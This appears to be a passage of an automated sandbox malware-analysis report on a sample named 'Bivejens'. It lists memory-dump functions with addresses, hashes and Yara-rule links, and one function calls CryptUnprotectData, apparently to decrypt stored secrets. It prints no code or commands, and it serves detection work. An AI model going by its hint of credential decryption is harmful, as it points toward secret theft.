Opcode Fuzzy Hash: 1ed035bb379bd7d6bbe830b0cb12e76c2667621ef471dcc3a13233baea59f147
Instruction Fuzzy Hash: 4911297680035DDFDB10DF9AC445BDEBBF5EB48320F148429EA58A7210C375A990DFA5

Function 21918EF1 Relevance: 1.6, APIs: 1, Instructions: 53
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 21918F5D

Memory Dump Source

Source File: 00000005.00000002.2617614147.0000000021910000.00000040.00000800.00020000.00000000.sdmp, Offset: 21910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_21910000_Bivejens.jbxd

Similarity

API ID: CryptDataUnprotect
String ID:
API String ID: 834300711-0
Opcode ID: eeecebf0c54561088d8e0a380838008077f5676214560984e3f0bbc87705722e
Instruction ID: 2c35268134723887e8c827a3d31bfa2061be2d8f744ca52224b514fa69053779
Opcode Fuzzy Hash: eeecebf0c54561088d8e0a380838008077f5676214560984e3f0bbc87705722e
Instruction Fuzzy Hash: E11156B68003499FDB10CF99C841BEEBFF5EF48320F148459EA58A7210C379A990DFA5

Function 219AD710 Relevance: .7, Instructions: 745COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2617780565.00000000219A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 219A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_219a0000_Bivejens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6801101af98d7087e18600c4fb3af0c89f1a70424ec5e0b2ea43dfaac646f033
Instruction ID: c15d815800460fec1b823b6d1d54ef18b3f94cf7ffed54a8bde84cfab5dc99f1
Opcode Fuzzy Hash: 6801101af98d7087e18600c4fb3af0c89f1a70424ec5e0b2ea43dfaac646f033
Instruction Fuzzy Hash: 3E825A74E012288FDB64DF69CD94B9DBBB2BB89300F1081EAD85DA7261DB315E85CF41

Function 21090B30 Relevance: .7, Instructions: 709COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2617313145.0000000021090000.00000040.00000800.00020000.00000000.sdmp, Offset: 21090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_21090000_Bivejens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b0a42f72982d3c65b30ff101f77c297bbbf2a1292dd5dd91a9455867d8afeefb
Instruction ID: 4f94af30552ded56e7bbba61dcf17f81ce7204e90ab31b4ae2d5b1743b360a7d
Opcode Fuzzy Hash: b0a42f72982d3c65b30ff101f77c297bbbf2a1292dd5dd91a9455867d8afeefb
Instruction Fuzzy Hash: AF72BD74E01228CFDB65DF69C890BDDBBB6BB89310F1481EAD448A7255DB349E81CF50

Function 001529EC Relevance: .7, Instructions: 700COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2595472438.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_150000_Bivejens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 071dfc0c93d28fc9a23f50b6bfd2239d446d5110969610a1a6a95e33a189bf4b
Instruction ID: 3a26405df433c58aff6a4e5c7a06cc87f7d7e4adb90e05d63a69c035268f7959
Opcode Fuzzy Hash: 071dfc0c93d28fc9a23f50b6bfd2239d446d5110969610a1a6a95e33a189bf4b
Instruction Fuzzy Hash: F0328E6690D7D08FCB638B7448A825B7FB06B93105BC945DFC4D78B687DB28C609C362

Function 219AEE48 Relevance: .7, Instructions: 677COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2617780565.00000000219A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 219A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_219a0000_Bivejens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a355684f01ef1c0b90e0da5a957f378fa2615c7dd11d3e8f84b134239425e75
Instruction ID: 5bd398fcd7f191207a760c85a259cd2f3559f02602f6836ca9463a55cbf0fd97
Opcode Fuzzy Hash: 7a355684f01ef1c0b90e0da5a957f378fa2615c7dd11d3e8f84b134239425e75
Instruction Fuzzy Hash: C9726B74E012288FEB64DF69CD94BDDBBB2BB89300F1081E9985DA7261DB315E85CF41

Function 001569E0 Relevance: .5, Instructions: 488COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2595472438.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_150000_Bivejens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 943f199d08fbc812852eb1cf44078a2d22519402df5892ad34571bc5cf5168d7
Instruction ID: 20dd5cfa8da6899e30b0f4e5962f426792df87c0aa0875f21b99785d0e708f01
Opcode Fuzzy Hash: 943f199d08fbc812852eb1cf44078a2d22519402df5892ad34571bc5cf5168d7
Instruction Fuzzy Hash: DF128F70B00219CFDB14DFA5C854BAEBBB6BF88301F608559E859EB391DB349D45CB90

Function 00156FC8 Relevance: .5, Instructions: 451COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2595472438.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_150000_Bivejens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 71fd1b909a4664eb7ef9c6c2cb6b6da648ff3e049cf38966821c4855b07774e9
Instruction ID: 528dc0a55b471ab1c08a96f8bff9abe4c7891021807bf8b3f22b19b6cd35f93c
Opcode Fuzzy Hash: 71fd1b909a4664eb7ef9c6c2cb6b6da648ff3e049cf38966821c4855b07774e9
Instruction Fuzzy Hash: 6B025F30A04219DFCB15CF68E885AADBBF2BF49311F158069EC25AB2A1D730DD45CF51

Function 21985FD8 Relevance: .3, Instructions: 300COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2617704881.0000000021980000.00000040.00000800.00020000.00000000.sdmp, Offset: 21980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_21980000_Bivejens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b6aea95eff5765e34fcb67e1e1ea5d8046f26dae33c0283cb77779189db5f7e
Instruction ID: 020427da9c6f007fa28d16618a4f582d2748a90b8e228c067b4416b9d3d82c4d
Opcode Fuzzy Hash: 1b6aea95eff5765e34fcb67e1e1ea5d8046f26dae33c0283cb77779189db5f7e
Instruction Fuzzy Hash: 3CE1C074E01218CFEB24DFA5C990B9DBBB2BF89304F1080AAD419BB355DB755A85CF50

Function 21917B78 Relevance: .3, Instructions: 296COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2617614147.0000000021910000.00000040.00000800.00020000.00000000.sdmp, Offset: 21910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_21910000_Bivejens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab0aa590986f852ba64963ffa7a00c43ccccd30c844cb25ebec17114d1ef612f
Instruction ID: b96f9764ffa0cc2a2e5b2fb50b93ed9f1d28015ae6352a39f68fb67eb74c3740
Opcode Fuzzy Hash: ab0aa590986f852ba64963ffa7a00c43ccccd30c844cb25ebec17114d1ef612f
Instruction Fuzzy Hash: CEE1C274E01218CFEB24DFA5C994B9DBBB2BF89304F2081AAD409A7395DB355E85CF10

Function 21989180 Relevance: .3, Instructions: 292COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2617704881.0000000021980000.00000040.00000800.00020000.00000000.sdmp, Offset: 21980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_21980000_Bivejens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2b2a372b6debe562c353326d45695561d7adc727f2529f65ea1db97dbbc006c
Instruction ID: d52af2b987ffae64e1757451bf5cbb11b4d4acc9d00ff017132a79db3426e653
Opcode Fuzzy Hash: b2b2a372b6debe562c353326d45695561d7adc727f2529f65ea1db97dbbc006c
Instruction Fuzzy Hash: 2FD18274E01228CFEB54DFA5C994B9DBBB2BF89300F5081A9D809AB355DB359E81CF50

Function 21986678 Relevance: .3, Instructions: 292COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2617704881.0000000021980000.00000040.00000800.00020000.00000000.sdmp, Offset: 21980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_21980000_Bivejens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b22f752f610d4eb475c9458e4c6aaac4c429591b73d0f4cad8933d06669d9962
Instruction ID: e91cce9bc73dfd79eb33a163bbb25cdad6d1b38e9c2792674ff9765cf11f667a
Opcode Fuzzy Hash: b22f752f610d4eb475c9458e4c6aaac4c429591b73d0f4cad8933d06669d9962
Instruction Fuzzy Hash: A9D19174E01228CFEB54DFA5C994B9DBBB2BF89300F6081A9D409AB355DB359E81CF50

Function 219B1CF0 Relevance: .3, Instructions: 292COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2617815047.00000000219B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 219B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_219b0000_Bivejens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4644f5e8921ecdc55ac9ccb9c3e52db90ff56870b52fbdefe351561023c1e2de
Instruction ID: 1d2c75ac3726c6d5609a86474aabfa0a49c625db556b16c022b2b22164b347ae
Opcode Fuzzy Hash: 4644f5e8921ecdc55ac9ccb9c3e52db90ff56870b52fbdefe351561023c1e2de
Instruction Fuzzy Hash: 2CD19174E01228CFEB54DFA5C994B9DBBB2BF89300F6081A9D409AB355DB359E81CF50

Function 21918FB0 Relevance: .3, Instructions: 272COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2617614147.0000000021910000.00000040.00000800.00020000.00000000.sdmp, Offset: 21910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_21910000_Bivejens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a277f1253d9644cf1a4925591dfdef8172777a9d72fb2b78638f300e51eb4b5
Instruction ID: dcf5e9113ce1c4c8e31d0965b580e60a26c6eee014f13f49430849a426ff7efb
Opcode Fuzzy Hash: 9a277f1253d9644cf1a4925591dfdef8172777a9d72fb2b78638f300e51eb4b5
Instruction Fuzzy Hash: FDD1B074E00218CFEB55DFA5C990B9DBBB2BF89300F5080A9D849AB355DB719E81CF10

Function 21092968 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2617313145.0000000021090000.00000040.00000800.00020000.00000000.sdmp, Offset: 21090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_21090000_Bivejens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 56e74741a0557cd8b98e8f704295ac565f84bd653f5526760178145a1ecbc169
Instruction ID: 7e5aca39a0403fdaf4dac157e0031d4257306cee5e732b93dfb92fc83c233c56
Opcode Fuzzy Hash: 56e74741a0557cd8b98e8f704295ac565f84bd653f5526760178145a1ecbc169
Instruction Fuzzy Hash: 0FC19074E01218CFDB14DFA5C994B9DBBB2BF89300F1081AAD809AB365DB359E85DF50

Function 2109CCA0 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2617313145.0000000021090000.00000040.00000800.00020000.00000000.sdmp, Offset: 21090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_21090000_Bivejens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a5586eda1bfc3f80c92079fa64e90d17ca14d226e0b183a9cff9579fd3e40e61
Instruction ID: 9b655160e72fb9ccba4ddd79407d506b63edd1581cc88ea7a56db90b17dd40e5
Opcode Fuzzy Hash: a5586eda1bfc3f80c92079fa64e90d17ca14d226e0b183a9cff9579fd3e40e61
Instruction Fuzzy Hash: 1CC1BF74E01218CFDB14DFA5C994B9DBBB2BF89300F6080AAD809AB355DB359E85DF50

Function 219108F0 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2617614147.0000000021910000.00000040.00000800.00020000.00000000.sdmp, Offset: 21910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_21910000_Bivejens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef07d672a978e93517a1d6a35809649834c35356945c1810eab6acd37315a269
Instruction ID: e9706004859bfce3e772e58ccf6e8f14e1a033cc797f38a1d0cba12a46cd6af7
Opcode Fuzzy Hash: ef07d672a978e93517a1d6a35809649834c35356945c1810eab6acd37315a269
Instruction Fuzzy Hash: 53C1B174E00218CFDB14DFA5C994B9DBBB2BF89300F6480AAD809AB355DB359E85CF50

Function 21B33E70 Relevance: .2, Instructions: 247COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2617941470.0000000021B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 21B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_21b30000_Bivejens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4004887ba42809fc17076cc65394b8126a78ffec8fce2b1204b3b83ae839ae7b
Instruction ID: 163068a459ce4eea37442d25769d98fdb676c32c62ae80ce17a39d4d606e9b2e
Opcode Fuzzy Hash: 4004887ba42809fc17076cc65394b8126a78ffec8fce2b1204b3b83ae839ae7b
Instruction Fuzzy Hash: E8914A71954618CFEB14EFA0C8997EEBBB1FB4A316F101429D1017B2E0CB794A48CF95

Function 21092DB8 Relevance: .2, Instructions: 221COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2617313145.0000000021090000.00000040.00000800.00020000.00000000.sdmp, Offset: 21090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_21090000_Bivejens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2ebb5ea1d8f1ec69cb39d7ba7e355b5ef5ffd8e4fcbdb2dd2e36c4c6ad98312
Instruction ID: e150c14f5e6fdfabe5324ad1ada3a973362a4cc94fd29d7ac1e6af8a648db33c
Opcode Fuzzy Hash: c2ebb5ea1d8f1ec69cb39d7ba7e355b5ef5ffd8e4fcbdb2dd2e36c4c6ad98312
Instruction Fuzzy Hash: ACA11470D00208CFEB10DFA5C994BDEBBB1FF89314F208269E509AB2A1DB759984CF55

Function 21092DC8 Relevance: .2, Instructions: 220COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2617313145.0000000021090000.00000040.00000800.00020000.00000000.sdmp, Offset: 21090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_21090000_Bivejens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cbd7abf6b07afb9b444ede7bc3cf6957f84f3ce171319e9f8b99425be280df12
Instruction ID: 9278c9ec53f82066849315a9eb9eecebbe8917306dbd0b049b8d5e06878d337f
Opcode Fuzzy Hash: cbd7abf6b07afb9b444ede7bc3cf6957f84f3ce171319e9f8b99425be280df12
Instruction Fuzzy Hash: 6AA10470D00208CFEB10DFA9C994BDDBBB1FF89314F208269E509AB2A1DB759985CF55

Function 2109310E Relevance: .2, Instructions: 202COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2617313145.0000000021090000.00000040.00000800.00020000.00000000.sdmp, Offset: 21090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_21090000_Bivejens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: efff716be614c742714756eef71c0507fd4b66fdd1a783e0fa0da82d7fb493b1
Instruction ID: 2d7cfc47b30bf3465c4f181f77054d38affd57b2ae2bb78182784237f14acbfa
Opcode Fuzzy Hash: efff716be614c742714756eef71c0507fd4b66fdd1a783e0fa0da82d7fb493b1
Instruction Fuzzy Hash: BB91D470D00618CFEB10DFA4C894BDDBBB1FF49314F2092A9E509AB2A1DB759985CF15

Function 219A70C0 Relevance: .2, Instructions: 200COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2617780565.00000000219A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 219A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_219a0000_Bivejens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 667fcfa1e3e56e54071fdb8f3f59caba65bb5ff6a492db9e7cc9bc27c15fc84c
Instruction ID: b43795529fcaed0df64d6b3ef4f4c4b46a2afeac13202507499ba999f8b6db18
Opcode Fuzzy Hash: 667fcfa1e3e56e54071fdb8f3f59caba65bb5ff6a492db9e7cc9bc27c15fc84c
Instruction Fuzzy Hash: E681C374E00218CFEB14DFA5C991B9DBBB2FF89300F608169D809AB354DB769986DF50

Function 219BFB30 Relevance: .2, Instructions: 200COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2617815047.00000000219B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 219B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_219b0000_Bivejens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80b7d7655b78c4ad0473f72d2c67f760cf4949edf8082aa12603ff8423371682
Instruction ID: 9e6efea662b65ff0f27d3faa9da2b47e78677ca991008d2d613ef09de90c8e7f
Opcode Fuzzy Hash: 80b7d7655b78c4ad0473f72d2c67f760cf4949edf8082aa12603ff8423371682
Instruction Fuzzy Hash: 5781B174E00218CFEB14DFA5C990BADBBB2FF89300F608169D819AB354DB359986DF50

Function 219B8470 Relevance: .2, Instructions: 200COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2617815047.00000000219B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 219B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_219b0000_Bivejens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6204a75b85c92cf75055ab33e5fe666cc174f447815f96fffa55a52b2a47e8d
Instruction ID: b62ee9ee111956f219d7d4e60e916e205830ed6ee9cad27fef0781faf2d7b68f
Opcode Fuzzy Hash: f6204a75b85c92cf75055ab33e5fe666cc174f447815f96fffa55a52b2a47e8d
Instruction Fuzzy Hash: AB81C274E00218CFEB14DFA5C990BADBBB2FF89304F608169D809AB354DB359996DF50

Function 0015C19B Relevance: .2, Instructions: 187COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2595472438.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_150000_Bivejens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e447eaafc79bb453f06680a26c2197413fd4b97a03ee302e793dd743d22724d
Instruction ID: 555d90e9399e14537bd77de0dc3c8de7f2fc5f72d22548d86bb2655c7d6a61d0
Opcode Fuzzy Hash: 9e447eaafc79bb453f06680a26c2197413fd4b97a03ee302e793dd743d22724d
Instruction Fuzzy Hash: DA81B474E00218CFDB54DFAAD884A9DBBF2BF89301F14C06AE819AB365DB745945CF50

Function 0015D278 Relevance: .2, Instructions: 187COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2595472438.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_150000_Bivejens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02a09867699606c5fcb06b23bc7ba512640c46a3869e0a7285b470f8111d7858
Instruction ID: 873bacafcdd391abe9ae99274e553fe63afc6128b510ae69c13c4e08ae9c12d7
Opcode Fuzzy Hash: 02a09867699606c5fcb06b23bc7ba512640c46a3869e0a7285b470f8111d7858
Instruction Fuzzy Hash: 6A81B474E00218CFDB54DFAAD884A9DBBF2BF89301F24C069E859AB361DB745945CF50

Function 0015CA08 Relevance: .2, Instructions: 187COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2595472438.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_150000_Bivejens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b192ead97c08f48a5a60873a80e681d10cf963f4e4a476ddfda10be37ad4840e
Instruction ID: 9643eeb76de3544c533a1b7108a2b50e29fa9d36862283f8f2c6b769c5a81263
Opcode Fuzzy Hash: b192ead97c08f48a5a60873a80e681d10cf963f4e4a476ddfda10be37ad4840e
Instruction Fuzzy Hash: F481B374E00218CFEB14DFAAD884A9DBBF2BF89311F14C169E819AB365DB349945CF50

Function 00155370 Relevance: .2, Instructions: 186COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2595472438.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_150000_Bivejens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ddaf8087d9a1430f6736cf34bc3d47d8371fd22c759f3ad592715e488df12279
Instruction ID: 07bd1f1ce1c04fb1062f000c89198b053a1ee320b3fa894d0a13dd2439c41a5b
Opcode Fuzzy Hash: ddaf8087d9a1430f6736cf34bc3d47d8371fd22c759f3ad592715e488df12279
Instruction Fuzzy Hash: FD81B574E00618DFDB14DFA9D894A9DBBF2BF89301F14C069E819AB361EB349985CF50

Function 0015C738 Relevance: .2, Instructions: 186COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2595472438.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_150000_Bivejens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d466f2388eaa43847555355af7ef9bf20ee42deae6227dc7baff4f1bbf55a679
Instruction ID: 906780bdb66406eb2740bbd11e9d01433e46f2501438bee896bddde7bec05391
Opcode Fuzzy Hash: d466f2388eaa43847555355af7ef9bf20ee42deae6227dc7baff4f1bbf55a679
Instruction Fuzzy Hash: A981B374E00218CFEB14DFAAD984B9DBBF2BF89304F14806AE859AB361DB345945CF50

Function 0015CCD8 Relevance: .2, Instructions: 186COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2595472438.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_150000_Bivejens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e4ae72a1bdc8537e6a0168457cbefe706baf2ac3b50405249308677a7330bed
Instruction ID: 8b7cdb232fa7cfa4a4aa262603f9ace2eb648f469ffae91a8aaf9e21621f7dcb
Opcode Fuzzy Hash: 8e4ae72a1bdc8537e6a0168457cbefe706baf2ac3b50405249308677a7330bed
Instruction Fuzzy Hash: 7881B374E00218DFEB14DFAAD884A9DBBF2BF89301F24C069E819AB361DB745945CF50

Function 0015CFAC Relevance: .2, Instructions: 185COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2595472438.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_150000_Bivejens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7176823703957d03b89d53a6fdc5d49fa48a4ca2c9b7b4194c124d08e126bb90
Instruction ID: a96d631b7f3fadfe73471691c90c1616062f5fd0c38c74afde0c2d3b6bf8e7aa
Opcode Fuzzy Hash: 7176823703957d03b89d53a6fdc5d49fa48a4ca2c9b7b4194c124d08e126bb90
Instruction Fuzzy Hash: 9181A574E00618CFEB14DFAAD884A9DBBF2BF89311F148069E819AB361DB749945CF50

Function 0015C474 Relevance: .2, Instructions: 183COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2595472438.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_150000_Bivejens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd7f994936c9a4e981f5902af21917e4f8b27165bef5f19444405b48df4a1110
Instruction ID: 1df9a80acc30115166a96ab57801f6c2e67cf4aa247cb40d195c125fe17f60ba
Opcode Fuzzy Hash: fd7f994936c9a4e981f5902af21917e4f8b27165bef5f19444405b48df4a1110
Instruction Fuzzy Hash: D381A474E00218CFDB14DFAAD884A9DBBF2BF88311F14D069E819AB365DB745945CF50

Function 0015E97C Relevance: .2, Instructions: 150COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2595472438.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_150000_Bivejens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4909ba3b3f87ae66baacbd63eae5c52d406d0f1c6af3639538fbf78b984cde21
Instruction ID: 37f59f5f6d2e6debceabf7347a458fe32d8df42873b021415f056a03958e1999
Opcode Fuzzy Hash: 4909ba3b3f87ae66baacbd63eae5c52d406d0f1c6af3639538fbf78b984cde21
Instruction Fuzzy Hash: B951B574E00208DFDB18DFB6D884A9DBBF2BF89300F24806AE819AB365DB355945CF14

Function 0015E988 Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2595472438.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_150000_Bivejens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 79bf9e241ccb32e513791b77c2281d587a5d940e092698110914bc4d83f32647
Instruction ID: 1b7ae53b67399834a96caf43b09e053e9c93fd9d7d9ccfb617b13e808fbf699c
Opcode Fuzzy Hash: 79bf9e241ccb32e513791b77c2281d587a5d940e092698110914bc4d83f32647
Instruction Fuzzy Hash: 5251A674E00208DFEB18DFA6D494A9DBBF2BF89300F24812AE819AB365DB715945CF14

Function 21985FC7 Relevance: .1, Instructions: 123COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2617704881.0000000021980000.00000040.00000800.00020000.00000000.sdmp, Offset: 21980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_21980000_Bivejens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e2142c10f7e977a498a4922d9d0d0a6e75d64cfa0b31b434e7b8d04923637b8a
Instruction ID: dabdb801bf0562174733b5574b4d4e15ed79deb6be13cff05a706df574e8c471
Opcode Fuzzy Hash: e2142c10f7e977a498a4922d9d0d0a6e75d64cfa0b31b434e7b8d04923637b8a
Instruction Fuzzy Hash: C541D0B1D006188BEB18DFAAC8507DEBBF2BF89304F24C06AC418BB255DB754986CF50

Function 21986668 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2617704881.0000000021980000.00000040.00000800.00020000.00000000.sdmp, Offset: 21980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_21980000_Bivejens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42a4807175081d42a6987a34adfd3a812c7247620c95686fbe11590ca9f61197
Instruction ID: ed9a858b09827c4bcb550afaabe3087b57997afc4bdc86b06231d8e9942eb973
Opcode Fuzzy Hash: 42a4807175081d42a6987a34adfd3a812c7247620c95686fbe11590ca9f61197
Instruction Fuzzy Hash: 6441E270E006188FEB18DFAAD8546DEBBF2BF89300F20D16AC418AB254EB345946CF50

Function 21989171 Relevance: .1, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2617704881.0000000021980000.00000040.00000800.00020000.00000000.sdmp, Offset: 21980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_21980000_Bivejens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a572cfc12d009225a8b035722ef2561a56664393e77a1d6846d1401f30245b08
Instruction ID: 03e624b563870727b45147114371859ce484fe360a5aa753845c54f9505c8ead
Opcode Fuzzy Hash: a572cfc12d009225a8b035722ef2561a56664393e77a1d6846d1401f30245b08
Instruction Fuzzy Hash: DC41C175E002188FEB18DFAAD954A9EBBF2BFC9300F10D16AD418BB254DB355946CF50

Function 219B1CE0 Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2617815047.00000000219B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 219B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_219b0000_Bivejens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a2425363261fd827d60b770b569f42874c8bef2c104bc79878e816e3cf3c0a2
Instruction ID: fe59c7eba2fa426422951795eb91b523f493d28fdd8cfd042ba70026ea95b201
Opcode Fuzzy Hash: 6a2425363261fd827d60b770b569f42874c8bef2c104bc79878e816e3cf3c0a2
Instruction Fuzzy Hash: 4841E474D042188FDB18DFAAD8546DDBBF2BF89300F14C069D418BB254EB355946CF50

Function 21B396F0 Relevance: 6.1, APIs: 4, Instructions: 135
threadCOMMON

Download Yara Rule

Control-flow Graph

